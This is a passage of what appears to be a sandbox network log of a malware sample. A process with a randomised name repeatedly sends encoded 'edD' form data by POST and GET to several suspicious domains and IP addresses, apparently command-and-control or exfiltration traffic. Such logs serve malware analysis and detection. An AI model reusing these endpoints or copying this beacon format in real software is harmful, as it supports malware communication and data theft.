                                                                                                                                Data Ascii: edD=yzT5osvCN/CmER092uPRgwYjUfAElrgrUaZa3DgkT//Vlxk0AuLaSExhnXL50JGoJMk01rkZd9KKl8RwE+7jO8mQDKHoxBCsHxpw/EvtIyoZTqJeNQMM8L6NY+LH9X1QudYD4DsIE7vZqos/dKzJCYWRWCMkjJw38NJp3wv0Nk/deESltJRBw40wf5RiYPFt2UwxfxvZZnR3wSTXpw5kYsX9Daeg
Oct 29, 2024 16:55:09.931350946 CET | 374 | IN | HTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:55:09 GMT
                                                                                                                                Server: Apache/2.4.62 (Unix)
                                                                                                                                Content-Length: 196
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Oct 29, 2024 16:55:09.931967974 CET | 374 | IN | HTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:55:09 GMT
                                                                                                                                Server: Apache/2.4.62 (Unix)
                                                                                                                                Content-Length: 196
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Oct 29, 2024 16:55:10.984937906 CET | 374 | IN | HTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:55:09 GMT
                                                                                                                                Server: Apache/2.4.62 (Unix)
                                                                                                                                Content-Length: 196
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Oct 29, 2024 16:55:10.985960960 CET | 374 | IN | HTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:55:09 GMT
                                                                                                                                Server: Apache/2.4.62 (Unix)
                                                                                                                                Content-Length: 196
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.8 | 49723 | 81.169.145.95 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 16:55:11.289499998 CET | 1745 | OUT | POST /pq4g/ HTTP/1.1
Host: www.treatyourownhip.online
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.treatyourownhip.online
Referer: http://www.treatyourownhip.online/pq4g/
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 1240
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Data Raw: 65 64 44 3d 79 7a 54 35 6f 73 76 43 4e 2f 43 6d 45 52 30 39 32 75 50 52 67 77 59 6a 55 66 41 45 6c 72 67 72 55 61 5a 61 33 44 67 6b 54 38 66 56 6c 44 73 30 42 49 44 61 64 6b 78 68 35 6e 4c 38 30 4a 47 78 4a 4d 4d 34 31 72 34 4a 64 2f 79 4b 6b 65 70 77 46 50 37 6a 48 38 6d 51 66 36 48 70 75 78 44 75 48 78 35 30 2f 45 2f 74 49 79 6f 5a 54 70 42 65 45 6c 67 4d 36 4c 36 53 64 2b 4c 39 76 6e 31 6f 75 64 77 54 34 44 59 79 45 4b 50 5a 71 49 38 2f 66 34 4c 4a 41 34 57 58 61 69 4d 47 6a 4a 74 33 38 4d 6c 44 33 77 62 53 4e 6d 76 64 66 52 33 69 70 35 4e 70 71 36 73 67 54 62 78 52 65 4f 78 36 2b 48 77 78 57 52 58 42 59 41 6c 50 38 79 33 4b 67 6e 34 50 43 74 62 73 52 39 4c 31 6c 56 45 6f 2b 39 58 6a 6a 39 34 45 76 39 57 54 6f 69 4f 58 33 47 35 4e 76 2b 32 43 44 35 44 30 53 4d 61 49 35 31 30 36 6e 64 4b 48 75 76 73 75 76 62 69 37 67 57 43 65 67 74 53 39 4c 75 53 47 39 62 43 69 72 6b 46 4b 41 36 6d 2b 6d 70 6e 43 58 67 57 4b 59 42 59 35 44 42 71 49 51 6d 59 6a 6f 64 47 52 4d 71 4f 4f 6d 61 4e 58 35 37 58 69 7a 59 [TRUNCATED]
Data Ascii: edD=[TRUNCATED]
Oct 29, 2024 16:55:12.115180016 CET | 374 | IN | HTTP/1.1 404 Not Found
Date: Tue, 29 Oct 2024 15:55:11 GMT
Server: Apache/2.4.62 (Unix)
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.8 | 49724 | 81.169.145.95 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 16:55:13.837423086 CET | 437 | OUT | GET /pq4g/?mRR=Vxudf0fHzLw84n3P&edD=/x7ZrZ76GI+PVQICx+fJsRsDfPwUjqoVDZRMpFR2TevR7yRDJNTVJQ5a4wLIxcipLtxsrpwhId74rtIBLdbLD5OWdqbGxCnsQwRTx3/JOzhGR6ZHHmQh6NCPA8f1t14f7g== HTTP/1.1
Host: www.treatyourownhip.online
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Oct 29, 2024 16:55:14.693185091 CET | 374 | IN | HTTP/1.1 404 Not Found
Date: Tue, 29 Oct 2024 15:55:14 GMT
Server: Apache/2.4.62 (Unix)
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.8 | 49725 | 45.79.252.94 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 16:55:20.164558887 CET | 696 | OUT | POST /4sq5/ HTTP/1.1
Host: www.premium303max.rest
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.premium303max.rest
Referer: http://www.premium303max.rest/4sq5/
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 204
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Data Raw: 65 64 44 3d 58 73 4b 48 62 54 75 76 78 66 37 38 38 48 46 72 4d 62 4b 49 4f 69 67 32 4f 76 57 4f 36 34 62 6e 2b 46 49 4b 6e 5a 78 52 51 39 34 36 43 72 44 35 67 59 6c 64 53 67 6e 6b 54 6f 67 4d 50 53 2b 54 47 4a 36 57 38 30 4d 35 4e 37 46 77 5a 6c 61 36 77 35 38 7a 41 69 64 78 77 57 6a 66 30 2b 38 4a 6a 69 59 64 47 48 39 44 64 30 51 6f 63 48 36 72 57 70 63 50 6c 6d 41 69 59 54 46 71 47 41 49 6f 64 45 54 48 66 67 70 32 57 61 37 43 5a 42 44 48 4d 6f 68 54 65 77 4b 49 5a 41 45 69 36 66 68 35 44 65 70 58 4b 37 66 52 6e 54 70 4a 2f 63 6b 35 79 64 79 48 33 5a 4f 62 64 39 79 57 66 55 52 46 7a 75 48 49 65 2f 63 3d
Data Ascii: edD=XsKHbTuvxf788HFrMbKIOig2OvWO64bn+FIKnZxRQ946CrD5gYldSgnkTogMPS+TGJ6W80M5N7FwZla6w58zAidxwWjf0+8JjiYdGH9Dd0QocH6rWpcPlmAiYTFqGAIodETHfgp2Wa7CZBDHMohTewKIZAEi6fh5DepXK7fRnTpJ/ck5ydyH3ZObd9yWfURFzuHIe/c=
Oct 29, 2024 16:55:20.852406979 CET | 399 | IN | HTTP/1.1 301 Moved Permanently
date: Tue, 29 Oct 2024 15:55:20 GMT
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
x-ua-compatible: IE=edge
x-redirect-by: WordPress
vary: X-Forwarded-Proto,Accept-Encoding
location: https://www.premium303max.rest/4sq5/
content-length: 0
content-type: text/html; charset=UTF-8
server: Apache
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.8 | 49726 | 45.79.252.94 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 16:55:22.715728998 CET | 716 | OUT | POST /4sq5/ HTTP/1.1
Host: www.premium303max.rest
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.premium303max.rest
Referer: http://www.premium303max.rest/4sq5/
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 224
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Data Raw: 65 64 44 3d 58 73 4b 48 62 54 75 76 78 66 37 38 38 6b 64 72 58 36 4b 49 47 69 67 35 53 2f 57 4f 74 6f 62 72 2b 46 55 4b 6e 62 63 4b 51 75 63 36 43 4b 7a 35 79 70 6c 64 52 67 6e 6b 59 49 67 4a 4c 53 2b 49 47 49 48 72 38 78 30 35 4e 37 52 77 5a 6e 43 36 77 49 38 77 41 79 64 7a 6f 6d 6a 52 77 2b 38 4a 6a 69 59 64 47 48 59 4c 64 30 49 6f 63 32 71 72 56 4b 45 51 37 57 41 68 66 54 46 71 43 41 49 7a 64 45 54 6c 66 68 46 59 57 59 7a 43 5a 41 7a 48 43 5a 68 51 52 77 4b 4b 57 67 46 47 30 66 55 51 62 2b 6f 30 43 71 37 53 6a 54 5a 53 2b 71 56 54 6f 2f 36 42 30 5a 6d 77 64 2b 61 67 61 6a 4d 74 70 4e 58 34 41 6f 4a 61 54 68 4c 34 44 71 4b 70 38 6d 73 77 4c 76 6b 76 43 4e 51 42
Data Ascii: edD=XsKHbTuvxf788kdrX6KIGig5S/WOtobr+FUKnbcKQuc6CKz5ypldRgnkYIgJLS+IGIHr8x05N7RwZnC6wI8wAydzomjRw+8JjiYdGHYLd0Ioc2qrVKEQ7WAhfTFqCAIzdETlfhFYWYzCZAzHCZhQRwKKWgFG0fUQb+o0Cq7SjTZS+qVTo/6B0Zmwd+agajMtpNX4AoJaThL4DqKp8mswLvkvCNQB
Oct 29, 2024 16:55:23.398262978 CET | 399 | IN | HTTP/1.1 301 Moved Permanently
date: Tue, 29 Oct 2024 15:55:23 GMT
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
x-ua-compatible: IE=edge
x-redirect-by: WordPress
vary: X-Forwarded-Proto,Accept-Encoding
location: https://www.premium303max.rest/4sq5/
content-length: 0
content-type: text/html; charset=UTF-8
server: Apache
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.8 | 49727 | 45.79.252.94 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 16:55:25.264614105 CET | 1733 | OUT | POST /4sq5/ HTTP/1.1
Host: www.premium303max.rest
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.premium303max.rest
Referer: http://www.premium303max.rest/4sq5/
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 1240
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Data Raw: 65 64 44 3d 58 73 4b 48 62 54 75 76 78 66 37 38 38 6b 64 72 58 36 4b 49 47 69 67 35 53 2f 57 4f 74 6f 62 72 2b 46 55 4b 6e 62 63 4b 51 75 55 36 43 38 6e 35 6a 36 4e 64 51 67 6e 6b 62 49 67 49 4c 53 2f 51 47 49 66 76 38 78 77 70 4e 39 56 77 62 43 65 36 32 39 63 77 4c 79 64 7a 30 57 6a 63 30 2b 38 63 6a 69 6f 5a 47 48 49 4c 64 30 49 6f 63 31 43 72 42 4a 63 51 35 57 41 69 59 54 45 6c 47 41 4a 39 64 45 61 61 66 68 77 74 57 49 54 43 5a 67 6a 48 41 72 4a 51 63 77 4b 45 66 77 46 65 30 66 49 4c 62 2b 31 48 43 71 4f 33 6a 51 4a 53 2f 4e 34 59 79 39 69 4b 6a 59 33 48 47 63 47 71 63 7a 59 74 76 73 75 4d 50 35 64 34 59 30 72 69 55 49 4b 7a 30 57 35 55 61 62 45 47 49 4b 78 75 57 77 71 31 50 59 77 57 4f 66 37 77 67 5a 78 58 68 78 69 6b 43 5a 38 2f 79 69 54 55 77 41 50 69 4b 43 68 30 71 52 4d 2f 2b 70 4d 37 38 57 45 36 79 4e 56 52 6e 6f 74 55 4f 76 42 43 64 51 43 39 30 55 58 77 65 4c 76 59 64 55 43 4f 69 38 64 54 39 71 51 62 45 61 41 79 57 61 31 44 2b 6b 46 53 44 75 53 45 68 67 4a 6e 74 55 6d 42 75 63 6c 33 63 63 [TRUNCATED]
Data Ascii: edD=XsKHbTuvxf788kdrX6KIGig5S/WOtobr+FUKnbcKQuU6C8n5j6NdQgnkbIgILS/QGIfv8xwpN9VwbCe629cwLydz0Wjc0+8cjioZGHILd0Ioc1CrBJcQ5WAiYTElGAJ9dEaafhwtWITCZgjHArJQcwKEfwFe0fILb+1HCqO3jQJS/N4Yy9iKjY3HGcGqczYtvsuMP5d4Y0riUIKz0W5UabEGIKxuWwq1PYwWOf7wgZxXhxikCZ8/yiTUwAPiKCh0qRM/+pM78WE6yNVRnotUOvBCdQC90UXweLvYdUCOi8dT9qQbEaAyWa1D+kFSDuSEhgJntUmBucl3cc+x+h73ka/GcBz86QFZL6RBbJ5NPeuesAlpluOyOhhz3KcfP0pD/YJGBZMe4eLj1xHYfWhdwsXDPiEyxIA8ZUxMOiVnKrJPngXqiZWsAfA4qPdCwsIghqP68r1P+5leT8AD1YovRhF819VTuH17+d4Sau5c4EMP2qOToN8mhiFpKeoHV1ppeBxYuYb82SJr/gZIZfOKCDcILn4rU2tWMJomUjL8LZhgabrEQo/UPUyBvxaWiroyBsgY21Dp1/uAtHdQlatsl2xhHNcjjanlb6ragJ9s2/2vATQLGO2LR8cHxbnT0ZKIm6ZbHOELfXESLZX3gh4zbXqic9ZHVhF2RDuj/4opDrfTTH5fi/midts4UY9fDXBzPXhhwlJvZuCDj97+AcbKDAXM2HhcCN/Mgt+DLtk2tbRD40JULzUnI9gKO6qm1qxJEPELlDzNhKTK3B5XMK1jkpZJHQmDLQi98DKtPjPSKwvyqxTPwvvmdyoIX77dXQeIrT4zLDVjmpDGizThqEDsOP8NVJQwK+PkvmbuLs0xBYSQ9iirdvFdvbSHXHCnVIzdzPgoCdVi14T5kOH3F3O73eKzViVPc80NfwaG3pjxGvwGUffeFGl8wB2VWzk9rzs5x+1VGyxvgel4YsOFyXYdTOsz1vrR+kFprn41Z3cVUbO5nXon [TRUNCATED]
Oct 29, 2024 16:55:25.959002018 CET | 399 | IN | HTTP/1.1 301 Moved Permanently
date: Tue, 29 Oct 2024 15:55:25 GMT
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
x-ua-compatible: IE=edge
x-redirect-by: WordPress
vary: X-Forwarded-Proto,Accept-Encoding
location: https://www.premium303max.rest/4sq5/
content-length: 0
content-type: text/html; charset=UTF-8
server: Apache
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.8 | 49728 | 45.79.252.94 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 16:55:27.809933901 CET | 433 | OUT | GET /4sq5/?edD=auinYk/N7fzuxFx7OuKPDQsKV8iAhIfXxmAc+9FVGd08SK7om5hBOw/tR9MrAyioRLaXqFIVFqwDeVrkz6gRFEBF2GjT/+1q0RocL006XFUWck2TAJQGogQWHAk4IwcjPQ==&mRR=Vxudf0fHzLw84n3P HTTP/1.1
Host: www.premium303max.rest
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Oct 29, 2024 16:55:28.497112989 CET | 552 | IN | HTTP/1.1 301 Moved Permanently
date: Tue, 29 Oct 2024 15:55:28 GMT
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
x-ua-compatible: IE=edge
x-redirect-by: WordPress
vary: X-Forwarded-Proto,Accept-Encoding
location: http://premium303max.rest/4sq5/?edD=auinYk/N7fzuxFx7OuKPDQsKV8iAhIfXxmAc+9FVGd08SK7om5hBOw/tR9MrAyioRLaXqFIVFqwDeVrkz6gRFEBF2GjT/+1q0RocL006XFUWck2TAJQGogQWHAk4IwcjPQ==&mRR=Vxudf0fHzLw84n3P
content-length: 0
content-type: text/html; charset=UTF-8
server: Apache
connection: close


                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                 21 | 192.168.2.8 | 49729 | 199.59.243.227 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                 Oct 29, 2024 16:55:33.945928097 CET | 699 | OUT | POST /xene/ HTTP/1.1
                                                                                                                                Host: www.adsdomain-195.click
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.adsdomain-195.click
                                                                                                                                Referer: http://www.adsdomain-195.click/xene/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 204
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Ascii: edD=lS3Gu6UA5k0FWKEkTyuNo5py6GcLmTADxTNViJ1dNx3t7jsSaddfqb3xmxUxR2o87wOa/BUnH/uYDHwTJ412J4VAXUUJzrW/p2EVSmlazQFFsC+4l/UAPBkZHhip54KZbszU+5QcqfEMGDr1xIWEfwvWNzjFrwhSbLbnPKQXt7tUciioXSO1p69MmtZMJyiyS8fE8NI=
                                                                                                                                 Oct 29, 2024 16:55:34.574779034 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                date: Tue, 29 Oct 2024 15:55:34 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                content-length: 1146
                                                                                                                                x-request-id: 126abb65-db51-4a32-9a8b-0be75d98aa4f
                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_njxd0w4B1slsBO5Y66xO3lN7AN+5YWz5VevXvFNbjhD7Br4eo/KTsn/VE6js8pVaRYwRKKGz/PdCrySj/UOB2g==
                                                                                                                                set-cookie: parking_session=126abb65-db51-4a32-9a8b-0be75d98aa4f; expires=Tue, 29 Oct 2024 16:10:34 GMT; path=/
                                                                                                                                connection: close
                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_njxd0w4B1slsBO5Y66xO3lN7AN+5YWz5VevXvFNbjhD7Br4eo/KTsn/VE6js8pVaRYwRKKGz/PdCrySj/UOB2g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                 Oct 29, 2024 16:55:34.574799061 CET | 599 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTI2YWJiNjUtZGI1MS00YTMyLTlhOGItMGJlNzVkOThhYTRmIiwicGFnZV90aW1lIjoxNzMwMjE3Mz


                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
